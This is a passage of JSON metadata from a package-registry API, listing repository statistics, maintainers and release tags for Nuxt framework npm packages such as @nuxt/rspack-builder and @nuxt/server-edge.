,"bot_issues_count":12,"bot_pull_requests_count":2971,"past_year_issues_count":714,"past_year_pull_requests_count":1194,"past_year_avg_time_to_close_issue":638727.5797872341,"past_year_avg_time_to_close_pull_request":219266.24555555556,"past_year_issues_closed_count":376,"past_year_pull_requests_closed_count":900,"past_year_pull_request_authors_count":116,"past_year_issue_authors_count":528,"past_year_avg_comments_per_issue":2.15266106442577,"past_year_avg_comments_per_pull_request":3.2939698492462313,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":485,"past_year_merged_pull_requests_count":792,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/issues","maintainers":[{"login":"danielroe","count":1324,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/danielroe"},{"login":"huang-julien","count":364,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/huang-julien"},{"login":"DamianGlowala","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/DamianGlowala"},{"login":"pi0","count":98,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pi0"},{"login":"Mini-ghost","count":91,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mini-ghost"},{"login":"manniL","count":76,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/manniL"},{"login":"BobbieGoede","count":70,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/BobbieGoede"},{"login":"antfu","count":63,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/antfu"},{"login":"userquin","count":50,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/userquin"},{"login":"cernymatej","count":44,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/cernymatej"},{"login":"TheAlexLichter","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/TheAlexLichter"},{"login":"OrbisK","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/OrbisK"},{"login":"wattanx","count":25,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/wattanx"},{"login":"Atinux","count":24,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Atinux"},{"login":"ineshbose","count":19,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ineshbose"},{"login":"atinux","count":19,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/atinux"},{"login":"productdevbook","count":16,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/productdevbook"},{"login":"dargmuesli","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dargmuesli"},{"login":"Hebilicious","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Hebilicious"},{"login":"warflash","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/warflash"},{"login":"lihbr","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lihbr"},{"login":"madebyfabian","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/madebyfabian"},{"login":"KazariEX","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/KazariEX"},{"login":"HugoRCD","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/HugoRCD"},{"login":"romhml","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/romhml"},{"login":"posva","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/posva"},{"login":"clarkdo","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/clarkdo"},{"login":"farnabaz","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/farnabaz"},{"login":"arashsheyda","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arashsheyda"},{"login":"Diizzayy","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Diizzayy"},{"login":"adhamfarrag","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/adhamfarrag"},{"login":"vargasmesh","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/vargasmesh"},{"login":"benjamincanac","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/benjamincanac"},{"login":"kikudesuyo","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kikudesuyo"},{"login":"kazupon","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kazupon"},{"login":"msmakouz","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/msmakouz"}],"active_maintainers":[{"login":"danielroe","count":233,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/danielroe"},{"login":"huang-julien","count":41,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/huang-julien"},{"login":"OrbisK","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/OrbisK"},{"login":"Mini-ghost","count":30,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mini-ghost"},{"login":"BobbieGoede","count":25,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/BobbieGoede"},{"login":"DamianGlowala","count":25,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/DamianGlowala"},{"login":"cernymatej","count":24,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/cernymatej"},{"login":"TheAlexLichter","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/TheAlexLichter"},{"login":"atinux","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/atinux"},{"login":"userquin","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/userquin"},{"login":"KazariEX","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/KazariEX"},{"login":"wattanx","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/wattanx"},{"login":"productdevbook","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/productdevbook"},{"login":"HugoRCD","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/HugoRCD"},{"login":"romhml","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/romhml"},{"login":"antfu","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/antfu"},{"login":"kikudesuyo","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kikudesuyo"},{"login":"ineshbose","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ineshbose"},{"login":"dargmuesli","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dargmuesli"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Frspack-builder/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Frspack-builder/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Frspack-builder/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Frspack-builder/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Frspack-builder/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Frspack-builder/codemeta","maintainers":[{"uuid":"nuxtbot","login":"nuxtbot","name":null,"email":"nuxtbot@roe.dev","url":null,"packages_count":148,"html_url":"https://www.npmjs.com/~nuxtbot","role":null,"created_at":"2024-09-24T15:10:11.359Z","updated_at":"2024-09-24T15:10:11.359Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/nuxtbot/packages"}],"registry":{"name":"npmjs.org","url":"https://registry.npmjs.org","ecosystem":"npm","default":true,"packages_count":5608775,"maintainers_count":1189233,"namespaces_count":373614,"keywords_count":0,"github":"npm","metadata":{"funded_packages_count":166557},"icon_url":"https://github.com/npm.png","created_at":"2022-04-04T15:19:23.081Z","updated_at":"2026-04-03T05:46:01.652Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/namespaces"}},{"id":1096119,"name":"@nuxt/server-edge","ecosystem":"npm","description":null,"homepage":"https://github.com/nuxt/nuxt#readme","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/nuxt/nuxt","keywords_array":[],"namespace":"nuxt","versions_count":1783,"first_release_published_at":"2018-10-30T20:47:06.303Z","latest_release_published_at":"2020-06-29T00:23:02.073Z","latest_release_number":"3.0.0-26556502.75dd90f2","last_synced_at":"2026-05-11T13:01:28.635Z","created_at":"2022-04-08T10:39:29.931Z","updated_at":"2026-05-11T13:01:28.635Z","registry_url":"https://www.npmjs.com/package/@nuxt/server-edge","install_command":"npm install @nuxt/server-edge","documentation_url":null,"metadata":{"funding":null,"dist-tags":{"next":"3.0.0-26556502.75dd90f2","latest":"2.18.2-28661769.e265ef3"}},"repo_metadata":{"id":37288797,"uuid":"71995937","full_name":"nuxt/nuxt","owner":"nuxt","description":"The Intuitive Vue Framework.","archived":false,"fork":false,"pushed_at":"2024-10-29T20:55:49.000Z","size":114898,"stargazers_count":54703,"open_issues_count":872,"forks_count":5004,"subscribers_count":793,"default_branch":"main","last_synced_at":"2024-10-29T21:25:05.500Z","etag":null,"topics":["csr","framework","full-stack","hacktoberfest","hybrid","node","nuxt","server-rendering","ssg","ssr","static-site-generator","universal","vue"],"latest_commit_sha":null,"homepage":"https://nuxt.com","language":"TypeScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/nuxt.png","metadata":{"files":{"readme":"README.md","changelog":"changelog.config.json","contributing":null,"funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null},"funding":{"github":["nuxt"],"open_collective":"nuxtjs"}},"created_at":"2016-10-26T11:18:47.000Z","updated_at":"2024-10-29T18:14:58.000Z","dependencies_parsed_at":"2023-12-19T04:00:01.692Z","dependency_job_id":null,"html_url":"https://github.com/nuxt/nuxt","commit_stats":{"total_commits":5138,"total_committers":630,"mean_commits":8.155555555555555,"dds":0.6897625535227715,"last_synced_commit":"800902df129a13e0da40b04b3a09e0d1a9852820"},"previous_names":["nuxt/nuxt.js"],"tags_count":223,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/nuxt","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":222121833,"owners_count":16934971,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"nuxt","name":"Nuxt","uuid":"23360933","kind":"organization","description":"The Intuitive Vue Framework","email":null,"website":"https://nuxt.com","location":"Global","twitter":"nuxt_js","company":null,"icon_url":"https://avatars.githubusercontent.com/u/23360933?v=4","repositories_count":61,"last_synced_at":"2024-05-20T15:02:00.816Z","metadata":{"has_sponsors_listing":true},"html_url":"https://github.com/nuxt","funding_links":["https://github.com/sponsors/nuxt"],"total_stars":99051,"followers":3259,"following":0,"created_at":"2022-11-02T16:30:40.909Z","updated_at":"2024-05-20T15:02:03.446Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/nuxt","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/nuxt/repositories"},"tags":[{"name":"v3.11.1","sha":"a80d1a0d6349bf1003666fc79a513c0d7370c931","kind":"commit","published_at":"2024-03-18T21:33:40.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.11.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.11.1/manifests"},{"name":"v3.11.0","sha":"78d5098c28d2e21622961d8b87ef9b4623194fec","kind":"commit","published_at":"2024-03-17T08:15:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.11.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.11.0/manifests"},{"name":"v3.10.3","sha":"aaad9924339b4c45d7feb45ed84bac4052edfcf0","kind":"commit","published_at":"2024-02-22T13:56:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.10.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.3/manifests"},{"name":"v3.10.2","sha":"ceebcde36642fd3711a2567658cb1337a0475153","kind":"commit","published_at":"2024-02-14T13:00:10.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.10.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.2/manifests"},{"name":"v3.10.1","sha":"460e0cfebd0ad19c7928c8d986e59f93a1bba1a3","kind":"commit","published_at":"2024-02-05T16:48:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.10.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.1/manifests"},{"name":"v3.10.0","sha":"da3c502f08587f93e1134bc8e7aea1dee8d628fb","kind":"commit","published_at":"2024-01-30T15:25:00.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.10.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.0/manifests"},{"name":"v3.9.3","sha":"fd8b263326c8703815a7e043948c22a8e5b969e2","kind":"commit","published_at":"2024-01-17T14:19:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.9.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.3/manifests"},{"name":"v3.9.2","sha":"97ed2df423ebd8038f16d81e00cd2836ba2d712a","kind":"commit","published_at":"2024-01-16T17:00:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.9.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.2/manifests"},{"name":"v2.17.3","sha":"4aa989d68a1934bd107fc5ad4e87549d39277ecd","kind":"tag","published_at":"2024-01-12T15:13:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.17.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.3/manifests"},{"name":"v3.9.1","sha":"6736decba0dc8bbc7276848a8a26973440ebdee4","kind":"commit","published_at":"2024-01-05T21:55:58.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.9.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.1/manifests"},{"name":"v3.9.0","sha":"c28ef02a1779b1c8a30c3daa2049d3c81a88ac91","kind":"commit","published_at":"2023-12-25T17:24:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.9.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.0/manifests"},{"name":"v3.8.2","sha":"8d1fc6c4a9b0f6a662a006489162e66fdeb677b1","kind":"commit","published_at":"2023-11-20T22:22:16.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.8.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.2/manifests"},{"name":"v3.8.1","sha":"d8674b99820d0e4dd620b20d38efb2ee52c80e52","kind":"commit","published_at":"2023-11-06T11:54:29.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.8.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.1/manifests"},{"name":"v2.17.2","sha":"2080d82471962a5a6ea2c7b38c8975c961e919f8","kind":"tag","published_at":"2023-10-24T03:05:46.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.17.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.2/manifests"},{"name":"v3.8.0","sha":"59ff865b133aaf82876f73b2d0566a00081b2795","kind":"commit","published_at":"2023-10-19T15:21:54.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.8.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.0/manifests"},{"name":"v3.7.4","sha":"5abd8a231f26a2e08071a59caa87b80eaaa6cd91","kind":"commit","published_at":"2023-09-26T00:18:14.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.7.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.4/manifests"},{"name":"v3.7.3","sha":"16e40f899e753208dd270c30869d240fbff0b8a2","kind":"commit","published_at":"2023-09-13T22:52:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.7.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.3/manifests"},{"name":"v3.7.2","sha":"ebacf199fe52b9dfd5cb48f2f4735df0e9adbaac","kind":"commit","published_at":"2023-09-12T21:35:55.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.7.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.2/manifests"},{"name":"v3.7.1","sha":"88a6d0a499cc7696bff94c02548cd9cc60f7820b","kind":"commit","published_at":"2023-09-05T13:49:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.7.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.1/manifests"},{"name":"v3.7.0","sha":"9013f88e75f499e650463e3c80d116d0ce898a14","kind":"commit","published_at":"2023-08-25T23:26:08.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.7.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.0/manifests"},{"name":"v3.6.5","sha":"f6a3adb52156774ab372829a2ee2533906758288","kind":"commit","published_at":"2023-07-19T17:40:34.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.5/manifests"},{"name":"v3.6.4","sha":"380a91985c350281aba2d8eb16c65b0ebc39ea8b","kind":"commit","published_at":"2023-07-19T15:19:14.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.4/manifests"},{"name":"v3.6.3","sha":"f068ad5edda4aaf79906a58ab472c9c3c0f564f1","kind":"commit","published_at":"2023-07-14T22:48:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.3/manifests"},{"name":"v2.17.1","sha":"9de25afa865ca6861a7bb6e3b6b89df56616d93d","kind":"tag","published_at":"2023-07-14T22:35:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.17.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.1/manifests"},{"name":"v3.6.2","sha":"88f914e9a01cb8ed196afb653dbcb4f7a5123b15","kind":"commit","published_at":"2023-07-05T21:42:25.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.2/manifests"},{"name":"v3.6.1","sha":"54a0d5e8dc2184f995169e6b4c5adaba9cffaa6c","kind":"commit","published_at":"2023-06-26T19:25:37.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.1/manifests"},{"name":"v3.6.0","sha":"e58cfc81f03a2323c95e6671af7deb4c4288bf39","kind":"commit","published_at":"2023-06-23T12:06:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.0/manifests"},{"name":"v2.17.0","sha":"1ce34ec2c438fbad9a04f7eda2ce4f439389ea9a","kind":"tag","published_at":"2023-06-09T20:51:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.17.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.0/manifests"},{"name":"v3.5.3","sha":"199595f3afac38b2a41be0a1c5593a8b6ea03366","kind":"commit","published_at":"2023-06-06T00:24:34.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.5.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts